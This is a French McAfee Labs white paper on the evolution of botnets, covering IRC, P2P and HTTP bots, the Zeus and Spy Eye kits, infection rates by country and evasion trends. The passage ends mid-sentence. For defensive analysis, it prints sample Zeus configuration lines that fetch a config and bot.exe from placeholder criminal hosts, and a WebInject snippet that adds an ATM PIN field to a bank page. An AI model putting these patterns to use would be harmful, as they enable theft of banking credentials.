LES RÉSEAUX DE ROBOTS À L'AUBE D'UNE NOUVELLE ÈRE - ZHENG BU, PEDRO BUENO, RAHUL KASHYAP ET ADAM WOSOTOWSKY MCAFEE LABS
←
→
Transcription du contenu de la page
Si votre navigateur ne rend pas la page correctement, lisez s'il vous plaît le contenu de la page ci-dessous
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Zheng Bu, Pedro Bueno, Rahul Kashyap et Adam Wosotowsky McAfee Labs™
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère Sommaire Le développement 3 Evolution 4 Robots IRC 4 Robots localisés 4 Robots peer-to-peer 4 Robots HTTP 5 Spy Eye 7 Prévalence mondiale 8 La distribution des réseaux de robots : principales menaces par pays 9 Le rôle des gouvernements 10 Personnes et entités à risque 11 Perspectives d'avenir 11 Une nouvelle génération de zombies de réseau social 12 Des méthodes toujours plus furtives 13 Une nouvelle arme : McAfee Global Threat Intelligence 14 Références 14 A propos de McAfee Labs™ 14 A propos de McAfee 14
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
L'histoire des réseaux de robots, ou botnets, a connu quelques rebondissements. Par essence, un robot
(bot) n'est jamais qu'une série de scripts ou de commandes, ou un programme conçu pour établir une
connexion (généralement à un serveur) et exécuter une ou plusieurs commandes. Fondamentalement,
il sert à exécuter de multiples fonctions ; il n'est pas nécessairement malveillant ou nuisible par nature.
Son usage a évolué au fil du temps. Au départ simples « observateurs » de canaux ou de jeux (comme les
robots Bartender de Wisner ou GM de Lindahl), les robots fournissent aujourd'hui des services spécialisés,
notamment dans le cadre de la gestion des bases de données ou de la maintenance des listes d'accès.
Le présent rapport se penche, quant à lui, sur un type d'utilisation très différent : le contrôle de robots
(également appelé « drones » ou « zombies ») par des cybercriminels pour faciliter et développer leurs
activités délictueuses.
Ces activités répréhensibles affectent les entreprises de diverses façons : vol de secrets commerciaux,
incorporation de logiciels malveillants dans des fichiers de code source, perturbation de l'accès ou
des services, compromission de l'intégrité des donnés et vol des informations d'identité du personnel.
Elles peuvent avoir des conséquences catastrophiques sur une entreprise et entraîner, par exemple, un
baisse des revenus, des infractions aux réglementations, la perte de confiance des clients, une réputation
entachée, voire la faillite de l'entreprise. En ce qui concerne les administrations publiques et les
organismes de secteur public, l'impact revêt une portée encore plus grande.
Ce livre blanc étudie l'évolution des robots criminels, le secteur qui soutient leur création et leur
distribution ainsi que leurs divers modes d'utilisation par les réseaux cybercriminels actuels. Il envisage
également l'évolution probable des robots dans un avenir proche.
Le développement
Les réseaux de robots affichent, malheureusement, une belle courbe de croissance. Les robots et les réseaux
de robots du début de ce siècle ont été créés par des programmeurs dotés de connaissances pointues des
réseaux et des protocoles, notamment le protocole IRC (Internet Relay Chat). L'exploitation d'IRC a marqué
le début d'une tendance au contrôle centralisé. Le robot SDBot, l'un des premiers et des plus célèbres, a été
codé en langage C++. (Son utilisation s'est rapidement répandue car son auteur a publié le code source, ce
qui constitue une pratique assez inhabituelle.) Les versions ultérieures de SDBot, également appelé SpyBot,
ont commencé à exploiter les vulnérabilités des appels de procédure à distance de Microsoft. Pour créer de
tels robots, les programmeurs devaient disposer de compétences en codage d'exploits. A cette époque, la
prolifération des robots et des botnets a été favorisée par les nombreuses vulnérabilités présentes sur les
plates-formes Windows les plus populaires, que les programmeurs n'ont pas manqué d'exploiter. Les robots
apparus par la suite intégraient, en plus, des fonctionnalités conçues notamment pour lancer des attaques par
déni de service, analyser les ports et enregistrer les frappes au clavier. Pour concevoir ces logiciels malveillants,
leurs auteurs devaient maîtriser un langage assembleur et bénéficier d'excellentes connaissances en matière de
réseaux. Le robot RBot, apparu en 2003, a été le premier à utiliser des programmes et modèles de compression
et de chiffrement tels que UPX, Morphine et ASPack. L'emploi de ces technologies a contribué à l'émergence
d'une nouvelle génération de programmeurs hautement qualifiés qui comprenaient les modèles de chiffrement
et la cryptographie et savaient intégrer les techniques de contournement aux fichiers binaires qu'ils créaient.
A ce stade, plus aucun retour en arrière n'était possible. Le succès de RBot a ouvert la voie à l'emploi
généralisé des techniques de chiffrement et de dissimulation dans les robots et les réseaux de robots.
Pour faciliter le contrôle de ces réseaux et les communications, l'une des grandes innovations a été
l'utilisation des réseaux peer-to-peer, notamment par Sinit (2003) et Phatbot (2004). L'adoption de
la technologie peer-to-peer a révolutionné la communication des réseaux de robots. Elle a d'ailleurs
favorisé l'apparition, en 2007, d'un des réseaux de robots peer-to-peer les plus évolués qui soient :
Storm Worm/Nuwar. Ce réseau, qui reposait sur une architecture peer-to-peer décentralisée, a été
pendant un certain temps exceptionnellement difficile à neutraliser.
Les nombreuses solutions de sécurité qui ont été développées pour combattre cette menace ont
conduit à une sophistication croissante de la technologie des robots. Celle-ci a favorisé à son tour
le développement de nouvelles technologies de sécurité, donnant lieu à une relation très complexe
entre auteurs de logiciels malveillants et éditeurs de solutions de sécurité, où les offensives des uns
succèdent aux contre-offensives des autres.
Il ne fait aucun doute que les réseaux de robots ont gagné en complexité. Ils exigent de leurs auteurs
des connaissances approfondies des technologies réseau, des systèmes et de la cryptographie. A la
lumière de leur envergure et de leur degré de sophistication, il est clair que ces réseaux de robots ne
sont pas le fait d'un petit groupe d'individus mais d'un véritable milieu cybercriminel, motivé par les
gains financiers générés par ces activités. Leur objectif est clair : la compromission des entreprises et le
vol de données possédant une valeur monétaire.
3
Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
Evolution
Robots IRC
Les premiers robots n'étaient pas toujours malveillants. Bien que cela ne soit plus vrai à présent,
surtout depuis leur explosion aux environs de 2004, les robots de la première génération utilisaient
généralement IRC comme protocole de contrôle.
IRC a été le premier protocole utilisé pour établir des connexions aux salles de conversation (chat rooms).
Très couramment utilisé il y a dix à quinze ans, il permettait aux utilisateurs d'échanger des messages.
Toutefois, avec l'avènement des protocoles de messagerie instantanée, tels que ICQ, AIM et MSN
Messenger, IRC a quelque peu perdu les faveurs du public, même s'il est toujours utilisé par de
nombreux professionnels de la sécurité et des réseaux traditionalistes.
Les premiers robots ont été créés pour se connecter à ces salles de conversations (aussi appelées
channels, « canaux ») et faire en sorte que le canal de communication reste ouvert, mais aussi pour
reconnaître les opérateurs du canal et leur permettre de le contrôler.
Certains programmeurs malveillants se sont mis à créer des robots capables de balayer le réseau et
d'exploiter les ordinateurs vulnérables. Dès qu'un ordinateur était compromis, le robot se connectait
à une salle de conversation (canal) spécifique et recevait ses instructions du maître du réseau de robots,
par exemple le lancement d'une attaque par déni de service contre un site web. Cette tactique est
toujours utilisée à l'heure actuelle, comme l'illustre la récente attaque W32/Vulcanbot lancée contre
des sites web de militants pour les droits de l'homme. D'autres fonctions IRC courantes consistent par
exemple à effectuer des captures d'écran de l'hôte, à télécharger ou à mettre à niveau un robot, etc.
Certains robots peuvent exécuter plus de cent commandes.
L'année 2004 a été caractérisée par une explosion du nombre de robots, due à la commercialisation de
nombreuses applications à interface utilisateur graphique qui permettaient aux pirates informatiques de
créer des robots par un simple pointer-cliquer. La simplification du processus de création a représenté une
grande avancée pour les cybercriminels et les auteurs de programmes malveillants : il n'était plus nécessaire
de posséder des compétences en programmation ni des connaissances approfondies des protocoles réseau
et des systèmes d'exploitation pour pouvoir créer un large éventail de robots. Quelques clics suffisaient.
Robots localisés
Bien que les robots s'exécutent en grande majorité sur des versions de Windows, certaines versions localisées
sont également apparues. A l'aide du langage de script Perl, des pirates informatiques ont créé des versions
de robots qui s'exécutent aussi sur plusieurs versions des systèmes Unix et Linux. C'est le groupe brésilien
Atrix-Team, au départ constitué de pirates en herbe, qui en est à l'origine. En raison du format en code
source ouvert de ces robots, bon nombre de ces versions sont encore employées aujourd'hui.
Robots peer-to-peer
Les réseaux de robots IRC d'ancienne génération sont toujours populaires, mais ils souffrent d'un point de
défaillance unique : le serveur IRC. Une fois ce dernier arrêté, le pirate perd le contrôle de son armée de robots.
L'année 2007 a vu apparaître un nouveau type de réseau de robots basé sur des protocoles P2P. Ce sont
les mêmes protocoles que ceux utilisés par de nombreux programmes pour télécharger de la musique,
par exemple. L'un de ces réseaux utilisait une implémentation chiffrée basée sur le protocole eDonkey.
Ce logiciel malveillant jouit d'une grande notoriété : au départ connu sous le nom de W32/Nuwar, il est
devenu célèbre sous le nom de ver Storm.
Storm incorporait près de cent « peers » (les unités d'un réseau peer-to-peer) codés sous la forme de
valeurs de hachage, que le programme malveillant déchiffrait et utilisait pour vérifier les nouveaux
fichiers à télécharger. Toutes les transactions étant chiffrées, seul le logiciel malveillant pouvait déchiffrer
la réponse et exécuter l'opération demandée. Les réponses redirigeaient généralement vers des URL qui
provoquaient le téléchargement d'autres fichiers binaires.
Storm a été à l'origine de la plupart du spam apparu au cours des années 2007 et 2008 avant d'être démantelé.
L'avantage de l'approche peer-to-peer réside dans sa structure de contrôle distribuée et résiliente,
qui rend l'arrêt d'un réseau de robots IRC plus ardu. Toutefois, elle est plus difficile à gérer et à propager
en raison de sa complexité.
Encore très récemment (à la fin du mois d'avril 2010), nous avons découvert un autre logiciel malveillant
qui utilisait en partie le même code que le ver Storm, notamment le code responsable d'attaques de
spam et par déni de service.
4Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
Robots HTTP
Il y a deux ou trois ans, nous avons observé un changement dans la manière dont les réseaux de robots
sont contrôlés, passant des canaux IRC à des sites web utilisant le protocole HTTP. Ce passage à un
protocole courant est une manœuvre très intelligente de la part des cybercriminels et des auteurs de
logiciels malveillants.
Cette transition vers HTTP a commencé grâce aux progrès réalisés en matière de « kits d'exploit ».
Ces kits, développés principalement par des cybercriminels russes, incluent Mpack, ICEPack et Fiesta. Ils
sont capables d'installer des logiciels sur des ordinateurs distants et de les contrôler à partir d'un site web
distant. Le cybercriminel envoie du spam ou un message instantané contenant divers liens à des victimes
potentielles. Ces liens redirigent les utilisateurs vers un site web sur lequel le kit d'exploit est installé.
A ce moment, le kit détermine quel exploit utiliser en fonction des caractéristiques de l'ordinateur cible :
le pays, le système d'exploitation, le navigateur et les multiples versions d'applications clientes. Toutes ces
opérations se déroulent de façon dynamique, à l'insu de l'utilisateur. Si l'exploitation réussit, il est possible
d'installer ultérieurement d'autres logiciels malveillants afin de prendre le contrôle de l'ordinateur infecté.
De tous les réseaux de robots HTTP actuels, le réseau Zeus (également appelé Zbot) est un cas à part,
spécialisé dans le vol d'informations d'identification bancaires. Zeus est composé d'un élément client et
d'un élément serveur. L'élément serveur possède un outil de type générateur (« builder ») qui permet
au maître du réseau de robots de créer sur le client une variante du logiciel malveillant PWS‑ZBot,
qui infecte ensuite un ordinateur et l'intègre au réseau de robots en le connectant à un site web
distant qui héberge le serveur Zeus.
Zeus est caractéristique d'une nouvelle tendance qui permet à pratiquement n'importe qui de créer
facilement une version personnalisée du logiciel malveillant. Le kit d'outils Zeus est assez cher à l'achat,
mais son auteur tout prévu pour que l'outil soit simple à utiliser et donc facile à vendre à un grand
nombre, ce qui augmente d'autant ses revenus.
L'exemple suivant illustre l'outil Zeus Builder version 1.2.x :
Le volet de gauche affiche deux options seulement : Information et Builder. La sélection de l'option
Information permet de savoir si l'ordinateur est infecté par Zeus. Quant à l'option Builder, elle offre
à l'individu qui contrôle le kit la possibilité de construire un nouveau robot. Le kit utilise deux fichiers
d'entrée : Config et WebInjects. Bien que l'outil Zeus Builder possède un bouton destiné à modifier le
fichier Config, il s'agit simplement d'un raccourci. Le fichier est modifié à l'aide du Bloc-notes. Le fichier
Config contient les paramètres que le robot doit exécuter.
5Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
Exemples de fichier Config :
…
url_config "http://www.[adresse-IP-malfaiteurs].cn/cp/config.bin"
url_compip "http://www.[adresse-IP-malfaiteurs].com/" 2048
encryption_key "12345654321"
;blacklist_languages 1049
end
entry "DynamicConfig"
url_loader "http://www.[autre-adresse-IP-malfaiteurs].cn/cp/bot.exe"
…
Cet extrait du fichier Config indique au robot où télécharger le fichier de configuration et le robot
lui-même. Ces étapes permettent aux maîtres des réseaux de robots de mettre à jour les robots et
les configurations avec de nouvelles fonctionnalités et cibles à tout moment. Elles leur permettent
également de distribuer le fichier de configuration et le fichier binaire du robot vers différents serveurs
et de rendre ainsi le réseau résilient grâce à une architecture distribuée.
Le second fichier nécessaire à la création du robot est WebInject. Ce fichier spécifie les cibles, ou victimes,
à qui l'auteur du logiciel malveillant ou propriétaire du kit d'outils veut dérober des informations. Zeus
est en mesure de collecter les informations de la page web d'origine mais aussi d'insérer des champs
supplémentaires. Il peut donc s'emparer d'informations supplémentaires si son propriétaire le décide.
Exemple de fichier WebInject :
…
set_url https://www.[grande-banque-victime].com/* G
data_before
data_end
data_inject
ATM PIN:
data_end
data_after
data_end
…
Ce code permet de recueillir des informations sur l'URL cible, qui dans cet exemple est une banque.
Outre le nom d'utilisateur et le mot de passe, Zeus injecte un autre champ pour recueillir le code de la
carte bancaire.
6Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
Comme de nombreux autres logiciels malveillants populaires, Zeus a donné lieu à plusieurs versions
« piratées » de son outil Builder. Comble de l'ironie, certains d'entre eux incorporaient même leur propre
porte dérobée (backdoor). La capture d'écran suivante illustre l'une de ces versions piratées :
Cette version, appelée MultiBuilder, a permis de créer deux variantes basées sur Zeus version 1.3.
Récemment, les auteurs de Zeus sont passés de la version 1.3 à la version 2.0, laquelle contient
désormais un modèle de licence strict. Etonnamment, Zeus est en fait lié à l'ordinateur de l'acheteur
à l'aide d'une licence logiciel commerciale. La technique de création et le canal de distribution de ce
logiciel malveillant témoignent d'un grand sens des affaires.
Spy Eye
Spy Eye est un autre exemple de robot HTTP complexe. Il présente plusieurs similitudes avec Zeus,
principalement en cela qu'il s'agit aussi d'un outil de collecte d'informations de formulaire et qu'il
repose sur une architecture de contrôle impressionnante.
A l'instar de Zeus, Spy Eye possède son propre générateur graphique :
7Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
Spy Eye a ceci d'intéressant qu'il peut détruire (supprimer) Zeus de l'ordinateur qu'il infecte, illustrant
ainsi les luttes intestines au sein de la communauté des auteurs de logiciels malveillants. Cette rivalité
n'est pas nouvelle. Pour éviter d'être analysés par leurs cibles, Zeus et Spy Eye offrent tous deux la
possibilité d'utiliser une clé de chiffrement pendant le processus de génération du robot. Dans les
premières versions de Zeus, cette clé était intégrée au code, ce qui permettait aux professionnels de la
sécurité d'analyser et d'identifier plus rapidement les cibles du logiciel malveillant. Avec cette nouvelle
fonctionnalité, les cybercriminels sont passés à la vitesse supérieure.
Prévalence mondiale
Distribution globale des réseaux de robots par pays
Inde
Brésil
Russie
Allemagne
Etats-Unis
Grande-Bretagne
Colombie
Indonésie
Italie
Espagne
Argentine
Pologne
Pakistan
Portugal
Vietnam
Corée du Sud
Grèce
Chine
Belarus
Australie
Autres
Figure 1 — McAfee Labs a observé plus de détections de réseaux de robots (près d'un million et demi) en Inde que dans
n'importe quel autre pays. Le Brésil, la Russie et l'Allemagne dépassent également le million d'infections.
8Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
La distribution des réseaux de robots : principales menaces par pays
Allemagne Argentine Asprox
Australie Belarus
Asprox Asprox Asprox
Bagle-CB Bagle-CB Bagle-CB Bagle-CB
Bobax Bobax Bobax Bobax
Cimbot Cimbot Cimbot Cimbot
Cutwail Cutwail Cutwail Cutwail
Cutwail2 Cutwail2 Cutwail2 Cutwail2
DarkMailer DarkMailer DarkMailer DarkMailer
Dlena Dlena Dlena Dlena
Donbot Donbot Donbot Donbot
Festi Festi Festi Festi
Gheg Gheg Gheg
Gheg
Grum Grum Grum
Grum
Grum2 Grum2
Grum2
Grum2
HelloGirl HelloGirl
HelloGirl HelloGirl
Lethic Lethic
Lethic Lethic
Maazben Maazben
Maazben Maazben
Mega-D Mega-D
Mega-D Mega-D
Netsky Netsky
Netsky Netsky
Autres Autres
Autres Autres
RK1 RK1
RK1 RK1
RK2 RK2
RK2 RK2
Reposin Reposin
Reposin Reposin
Rustock Rustock
Rustock Rustock
Storm Storm
Storm Storm
TwitGenPhish TwitGenPhish
TwitGenPhish TwitGenPhish
Xarvester Xarvester
Xarvester Xarvester
Brésil Asprox
Chine Asprox
Colombie Asprox
Corée du Sud Asprox
Bagle-CB Bagle-CB Bagle-CB Bagle-CB
Bobax Bobax Bobax Bobax
Cimbot Cimbot Cimbot Cimbot
Cutwail Cutwail Cutwail Cutwail
Cutwail2 Cutwail2 Cutwail2 Cutwail2
DarkMailer DarkMailer DarkMailer
DarkMailer
Dlena Dlena
Dlena Dlena
Donbot Donbot
Donbot Donbot
Festi Festi
Festi Festi
Gheg Gheg
Gheg Gheg
Grum Grum
Grum Grum
Grum2 Grum2
Grum2 Grum2
HelloGirl
HelloGirl HelloGirl HelloGirl
Lethic
Lethic Lethic Lethic
Maazben
Maazben Maazben Maazben
Mega-D
Mega-D
Mega-D Mega-D
Netsky
Netsky
Netsky Netsky
Autres
Autres
Autres Autres
RK1
RK1
RK1 RK1
RK2
RK2
Reposin
RK2 RK2
Reposin
Rustock Reposin Reposin
Rustock
Storm Rustock Rustock
Storm
TwitGenPhish Storm Storm
TwitGenPhish
Xarvester TwitGenPhish TwitGenPhish
Xarvester
Xarvester Xarvester
Espagne Etats-Unis Asprox
Grande-Bretagne Asprox
Grèce
Asprox Asprox
Bagle-CB Bagle-CB Bagle-CB Bagle-CB
Bobax Bobax Bobax Bobax
Cimbot Cimbot Cimbot Cimbot
Cutwail Cutwail Cutwail Cutwail
Cutwail2 Cutwail2 Cutwail2
Cutwail2
DarkMailer DarkMailer DarkMailer
DarkMailer
Dlena Dlena Dlena
Dlena
Donbot Donbot Donbot
Donbot
Festi Festi Festi
Festi
Gheg Gheg Gheg
Gheg
Grum Grum Grum
Grum
Grum2 Grum2 Grum2
Grum2
HelloGirl HelloGirl
HelloGirl HelloGirl
Lethic Lethic
Lethic Lethic
Maazben Maazben
Maazben Maazben
Mega-D Mega-D
Mega-D Mega-D
Netsky Netsky
Netsky
Netsky
Autres
Autres Autres
Autres
RK1
RK1 RK1
RK1
RK2
RK2 RK2
RK2
Reposin
Reposin Reposin
Reposin
Rustock
Rustock Rustock
Rustock
Storm
Storm Storm
TwitGenPhish
Storm
TwitGenPhish TwitGenPhish
Xarvester TwitGenPhish
Xarvester Xarvester
Xarvester
9Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
Inde Indonésie Asprox
Italie Asprox
Pakistan Asprox
Asprox
Bagle-CB Bagle-CB Bagle-CB Bagle-CB
Bobax Bobax Bobax Bobax
Cimbot Cimbot Cimbot Cimbot
Cutwail Cutwail Cutwail Cutwail
Cutwail2 Cutwail2 Cutwail2 Cutwail2
DarkMailer DarkMailer DarkMailer DarkMailer
Dlena Dlena Dlena Dlena
Donbot Donbot Donbot Donbot
Festi Festi Festi Festi
Gheg Gheg Gheg Gheg
Grum Grum Grum Grum
Grum2 Grum2 Grum2
Grum2
HelloGirl HelloGirl HelloGirl
HelloGirl
Lethic
Lethic Lethic Lethic
Maazben
Maazben Maazben Maazben
Mega-D
Mega-D Mega-D Mega-D
Netsky
Netsky Netsky Netsky
Autres
Autres Autres Autres
RK1
RK1 RK1 RK1
RK2
RK2 RK2 RK2
Reposin
Reposin Reposin Reposin
Rustock
Rustock Rustock Rustock
Storm
Storm Storm Storm
TwitGenPhish
TwitGenPhish TwitGenPhish TwitGenPhish
Xarvester
Xarvester Xarvester Xarvester
Pologne Portugal Asprox
Russie Asprox
Vietnam Asprox
Asprox
Bagle-CB Bagle-CB Bagle-CB Bagle-CB
Bobax Bobax Bobax Bobax
Cimbot Cimbot Cimbot Cimbot
Cutwail Cutwail Cutwail Cutwail
Cutwail2 Cutwail2 Cutwail2 Cutwail2
DarkMailer DarkMailer DarkMailer DarkMailer
Dlena Dlena Dlena Dlena
Donbot Donbot Donbot Donbot
Festi Festi Festi Festi
Gheg Gheg Gheg Gheg
Grum Grum Grum Grum
Grum2 Grum2 Grum2
Grum2
HelloGirl HelloGirl HelloGirl
HelloGirl
Lethic Lethic
Lethic Lethic
Maazben Maazben
Maazben Maazben
Mega-D Mega-D
Mega-D Mega-D
Netsky
Netsky Netsky Netsky
Autres
Autres Autres Autres
RK1
RK1 RK1 RK1
RK2
RK2 RK2 RK2
Reposin
Reposin Reposin Reposin
Rustock
Rustock Rustock Rustock
Storm
Storm Storm Storm
TwitGenPhish
TwitGenPhish TwitGenPhish TwitGenPhish
Xarvester
Xarvester Xarvester Xarvester
Figure 2 — Principaux réseaux de robots par pays. Rustock est de loin le réseau de robots le plus « populaire » au monde.
Le rôle des gouvernements
A mesure que la menace de cyberguerre se précise et que les dommages potentiels d'une telle guerre
augmentent, tout porte à croire que les réseaux de robots seront une arme de prédilection dans les
conflits à venir. Il se peut d'ailleurs qu'ils aient déjà été utilisés.
Dans un monde où les technologies occupent une place de plus en plus importante, l'efficacité des
communication est capitale dans la résolution ou la gestion d'une crise. L'organisation des ressources
et leur capacité à réagir face à des incidents d'origine naturelle ou humaine dépendent fortement
d'Internet, un outil capital dans la diffusion des informations à un large éventail de parties et à la
coordination de leurs réponses. Toute dégradation ou interruption de ce flux d'informations peut
encore aggraver un incident. Internet pourrait bien devenir un nouveau théâtre de combats.
Des événements tels que la marée noire dans le Golfe du Mexique, les attentats à la bombe en Europe
et en Irak ou les manœuvres navales entre les deux Corées peuvent être affectés par des interruptions
ciblées des organes de presse ou des équipes d'intervention d'urgence qui dépendent d'Internet.
Il est possible d'acheter ou de louer des réseaux de robots au marché noir, voire même d'en prendre
le contrôle et de les utiliser à d'autres fins. Ce type d'intervention n'étant pas rare, il serait donc naïf
de croire que des agences du secteur public ou des Etats sont en reste et ne pourraient pas eux aussi
acquérir des réseaux de robots à des fins offensives ou contre-offensives.
Une entité civile ou nationale a toutes les raisons de vouloir s'emparer d'un réseau de robots.
Ces réseaux infiltrent les sociétés privées, les particuliers et les organismes officiels ainsi que les postes de
travail militaires. Il est capital que les droits de propriété intellectuelle et de confidentialité des citoyens
et des institutions du monde entier soient protégés contre des individus susceptibles d'en faire une
utilisation illégale. La prise de contrôle d'un réseau de robots contraint son nouveau « maître » à décider
d'une stratégie : soit démanteler le système, ce qui peut endommager les ordinateurs qui font partie du
réseau de robots, provoquer des interruptions au niveau de l'infrastructure et éventuellement mettre en
10Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
cause la responsabilité du nouveau maître du réseau ; soit désactiver le réseau jusqu'à la mise à niveau
des nœuds infectés et leur « affranchissement » ; soit encore surveiller le réseau de robots pour identifier
et procéder à l'arrestation de son contrôleur. Chacune de ces options est sujette à controverse.
Personnes et entités à risque
Tous les utilisateurs d'ordinateur courent un risque puisque tous (ou presque) se servent d'Internet. Les moyens
dont disposent les cybercriminels pour infecter un hôte ou un réseau avec leurs robots ou toute autre forme
de logiciel malveillant sont limités. Ils ont généralement recours à l'ingénierie sociale, une technique qui
revient essentiellement à « pirater » le cerveau humain. Les auteurs d'attaques emploient un stratagème ou
un leurre pour inciter les internautes à cliquer sur un lien ou à installer un programme alors que ce n'était pas
leur intention au départ. A l'heure actuelle, l'une des techniques les plus répandues et astucieuses consiste
à exploiter des événements très médiatisés. L'actualité est la même pour tous et les cybercriminels savent
pertinemment que de nombreux internautes lisent la presse en ligne. Qu'il s'agisse d'un lien vers une vidéo
sur une catastrophe récente ou un scandale impliquant une célébrité, ces leurres ont un attrait irrésistible
pour bon nombre d'utilisateurs. Les auteurs de ces attaques pourraient donner des leçons aux responsables
marketing par leurs connaissances pointues du comportement humain et des centres d'intérêt des utilisateurs
lorsqu'ils surfent sur Internet. Tous les internautes doivent être conscients des risques associés à la navigation
et à l'utilisation des technologies web 2.0 car c'est l'arme de prédilection des cybercriminels.
Même si les particuliers doivent se méfier des attaques véhiculées par les sites de réseau social, ce sont
les sociétés et les gouvernements qui ont le plus à pâtir des attaques de réseaux de robots. Les menaces
auxquelles les sociétés sont exposées sont légion :
• Fraude aux clics : vol de sommes considérables aux agences de publicité en ligne grâce à une
technique qui consiste à accéder à des pages web et à exécuter automatiquement des clics sur
des bannières publicitaires
• Attaques par déni de service distribué : saturation de la bande passante pour bloquer le trafic légitime,
attaques le plus souvent exécutées par des concurrents, des clients mécontents ou pour des raisons politiques
• Infiltration des systèmes de fichiers : accès à des systèmes critiques dans le but de s'emparer
d'informations sur les clients, de données confidentielles sur le personnel, de secrets commerciaux,
de données financières, etc.
• Désactivation de la sécurité en place : blocage des tentatives de nettoyage ou piratage par des
propriétaires de robots concurrents
• Spam : utilisation des ressources et de la bande passante d'autres systèmes pour envoyer d'énormes
volumes de spam
• Infection du code source : empoisonnement de toute l'arborescence du code source par l'insertion de
modifications non autorisées et impossibles à détecter ou la découverte de nouvelles vulnérabilités à exploiter
Les conséquences de ces attaques peuvent être graves et contraindre les sociétés à un investissement
important en temps et en main d'œuvre pour les neutraliser. En outre, les sociétés peuvent être exposées
à des sanctions et amendes pour non-respect des réglementations ou des normes sectorielles. Les clients,
les employés ou d'autres parties peuvent également engager la responsabilité de la société lorsque
celle‑ci n'a pas su respecter ses impératifs de sécurité.
Pour les gouvernements et les propriétaires d'infrastructures critiques, les dommages provoqués par les
réseaux de robots peuvent être encore plus graves :
• Les attaques par déni de service peuvent perturber les communications en temps de crise.
• Les infections du code source peuvent provoquer l'arrêt de réseaux critiques.
• L'accès à des systèmes critiques peut permettre à l'ennemi de s'emparer de renseignements militaires.
Perspectives d'avenir
Au cours des six dernières années, les réseaux de robots sont devenus l'une des menaces majeures non
seulement pour les professionnels de la sécurité mais aussi pour les entreprises et les particuliers — en
d'autres mots, pour pratiquement tous les utilisateurs d'ordinateur. Ces réseaux sont désormais la principale
infrastructure utilisée par les cybercriminels et certains gouvernements pour lancer pratiquement tous les types
d'attaques informatiques : exfiltration de données, espionnage, spam et autres attaques par déni de service.
McAfee Labs a déjà observé une nette tendance vers des infrastructures de réseaux de robots plus
résilientes et distribuées, lesquelles reposent sur des technologies robustes telles que le peer-to-peer,
le contrôle web et les services web 2.0 ainsi que sur des techniques de contournement et de basculement.
11Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
Une nouvelle génération de zombies de réseau social
Les techniques employées par les créateurs de réseaux de robots connaissent une évolution parallèle
à celle des services web 2.0 : les nouvelles technologies sont rapidement adoptées afin d'accroître la
sophistication des attaques.
A l'heure de la rédaction, KeriosC2 faisait son apparition. Il s'agit d'un outil de preuve du concept qui
montre comment exploiter LinkedIn, Twitter et TinyURL pour contrôler un réseau de robots. Au même
titre que les internautes du monde entier, les réseaux de robots profitent désormais des avantages
offerts par les réseaux sociaux. Un phénomène qui ne peut qu'inquiéter.
Tout porte à croire que les réseaux de robots continueront à exploiter pendant longtemps encore les
applications et protocoles les plus courants et deviendront toujours plus difficiles à détecter et à bloquer.
La situation a connu une nouvelle évolution en mai, lorsque certains robots ont commencé à utiliser
Twitter pour recevoir des commandes. A ce stade, les fonctionnalités restent assez simples. Elles se
contentent de « suivre » un compte Twitter pour recevoir des commandes. Comme vous pouvez
le constater dans la capture d'écran suivante, le robot possède un générateur doté d'une interface
utilisateur graphique très simple.
A la différence des outils Zeus ou Spy Eye beaucoup plus complexes, ce formulaire ne contient aucune
option mais un simple champ destiné à la saisie du nom de l'utilisateur Twitter que le robot suivra pour
recevoir des commandes. A l'heure de la rédaction, la structure et la syntaxe des commandes étaient
également rudimentaires.
.VISIT ouvre une page spécifique.
.DOWNLOAD télécharge un fichier depuis un emplacement distant.
.DDOS exécute une attaque de type déni de service sur un ordinateur cible.
12Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
Des méthodes toujours plus furtives
Les auteurs de réseaux de robots rivalisent d'ingéniosité pour tromper la vigilance des logiciels et
périphériques de sécurité. Pour ce qui est de la procédure, les auteurs de logiciels malveillants testent
généralement leurs programmes avec les produits des principaux éditeurs de sécurité afin de s'assurer
que leurs logiciels échappent à la plupart des outils de détection. Par conséquent, les cybercriminels et
auteurs de logiciels malveillants affirment souvent que leurs produits sont « indétectables ».
Les listes de contrôle d'accès ou la mise en œuvre de stratégies relatives aux adresses IP peuvent constituer
une mesure de contrôle efficace pour bloquer les connections d'un robot à ses serveurs de contrôle.
Les créateurs de réseaux de robots et de logiciels malveillants ont contourné cette contre-mesure en
implémentant des algorithmes en flux au lieu d'utiliser des listes d'adresses IP codées pour leurs serveurs
de contrôle. Zeus a recours à cette technique pour générer des domaines à la volée. Cette stratégie permet
de tenir en échec de nombreux mécanismes de détection classiques, basés sur les listes de blocage.
Les cybercriminels ont mis au point de multiples techniques de contournement pour les téléchargements
involontaires afin d'échapper au contrôle des appliances de sécurité réseau. A titre d'exemple, citons
la manipulation des extensions de fichier effectuée par le générateur Gh0st RAT (illustrée dans la
capture d'écran suivante). Les attaques de logiciels malveillants et notamment l'opération Aurora ont eu
recours à des stratagèmes similaires. Pour installer leurs logiciels malveillants sur l'ordinateur cible sans
être détectés, les auteurs exploitent de nombreuses autres méthodes, de l'encodage au chiffrement
(par exemple le chiffrement XOR du fichier binaire).
Ces dernières années, plusieurs réseaux de robots majeurs ont été démantelés. Face à ces succès du
secteur de la sécurité et pour renforcer la robustesse et la résilience des infrastructures de réseaux de
robots, les contrôleurs de ces réseaux ont commencé à introduire de nouvelle techniques. Comme nous
l'avons déjà fait remarquer, les techniques basées sur les flux permettent d'améliorer la résilience
des serveurs de contrôle. Les protocoles peer-to-peer, en dépit du coût de leur implémentation et de
leur support, ont été également utilisés dans quelques réseaux de robots furtifs, tels que Storm et
Nugache. Les protocoles web, qu'ils soient chiffrés ou non, sont largement utilisés comme protocole de
commande à la place du protocole IRC, pour la simple raison que les pare-feux autorisent pratiquement
toujours l'accès à ces ports web, même dans des réseaux d'entreprise extrêmement contrôlés.
Pour McAfee Labs, il est clair que les cybercriminels et les créateurs de réseaux de robots continueront à
